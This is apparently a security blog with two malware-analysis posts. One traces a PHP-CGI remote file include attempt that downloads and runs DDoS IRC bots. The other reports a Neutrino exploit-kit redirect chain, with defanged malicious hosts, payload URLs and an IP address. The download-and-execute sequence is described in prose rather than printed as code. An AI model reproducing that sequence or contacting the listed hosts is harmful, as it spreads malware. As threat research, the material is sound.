DDOS IRC Bot Analysis

 

This post was contributed by my good friend and all around good guy, @hkmalwares.

In the last couple weeks I saw some interesting PHP CGI remote file include attempts that contained a few DDOS IRC bots. I know these attempts are quite common in the wild but this one stood out as it downloaded two different IRC bots. In this post i’m going to share my encounter in what I thought was interesting and do a basic breakdown.
The IDS Rule that brought this to my attention was SERVER-WEBAPP PHP-CGI Remote file include attempt SID 22063.

ddosbot_image1

What triggered this rule is the auto_prepend_file content within a truncated request.
ddosbot_image2

In this case if the exploit was successful, it would try to wget, curl, and fetch in order to pull down a possible malicious payload.
ddosbot_image3

Basically, what it’s doing is changing directories to /tmp, wgets seed.jpg, untars it, grants file execution permissions on seed.jpg, runs it, and then deletes itself.
Let go ahead and try to simply cat seed.jpg
ddosbot_image4

As expected.. garble. Notice seed.tar. Lets go ahead and untar it and cat it out.
ddosbot_image5

The tar contains a bash script that pulls down two payloads. First lets dig into ddosperl.jpg. When untar’d it spits out libssl3.so.2 into /var/temp. So what is libssl3.so.2? DDOS Perl IRC bot v1.0. A quick Google search revealed a [pastebin] containing the perl script.
ddosbot_image6

ddosbot_image7

The next payload observed is little bit more interesting. Going back to the second payload defined in seeds.jpg we see another wget for flbotbsd.jpg. Again it’s a tar and it extracts a hidden directory “.d” followed by removing flbotbsd.jpg and executing ./autorun.
ddosbot_image8

I came across what appears to be another IRC bot config belonging to the same group within mech.set.
ddosbot_image9

After performing a quick Google searches I came across others who have encountered this bot before. Caffsec is calling it FlooderIRCBot.

ddosbot_image11

A [pastebin] posted back in April contains a description of most of the files seen within “.d”. Looks like this bot contains a variety of flooder options.

ddosbot_image12

However on my example I see some tools missing and some tools that have been added such as ZmEu v0.2 , XHide – Process Faker and ZAP. As for AV detection’s, a lot of these hack tools have been around for a while so the detection ratios were quite high.
I think this is a good place to stop as this post is getting to long and was only meant to be a basic dive.

Neutrino at peopleofwalmart[.]com

(Quick post for awareness). Visitors of www.peopleofwalmart[.]com may encounter the Neutrino exploit kit after clicking through the results of a web search.

The initial redirect is hiding at /wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js
decode

Injected code loads Javascript from cda.8s[.]nl/js/ca.js which in turn contains code to create an iframe with the contents of cms.8s[.]nl/index.php?two where a table frameset pulls the landing page from eipei2i.daremis[.]com:8000/iolfyfsow?brvdgrgc=5534337
Copy of the landing page for your review: [pastebin].
two

.jar at eipei2i.daremis[.]com:8000/etfujnjzq?yuabqjfc=vmjept with Content-Type: image/jpeg and encoded payload at eipei2i.daremis[.]com:8000/noxjwhhojy?yrdpew=vmjept with Content-Type: audio/mpeg

people-of-walmart-jarpeople-of-walmart-payload

At the time of this encounter both cda.8s[.]nl and eipei2i.daremis[.]com were at IP 37.228.92.196.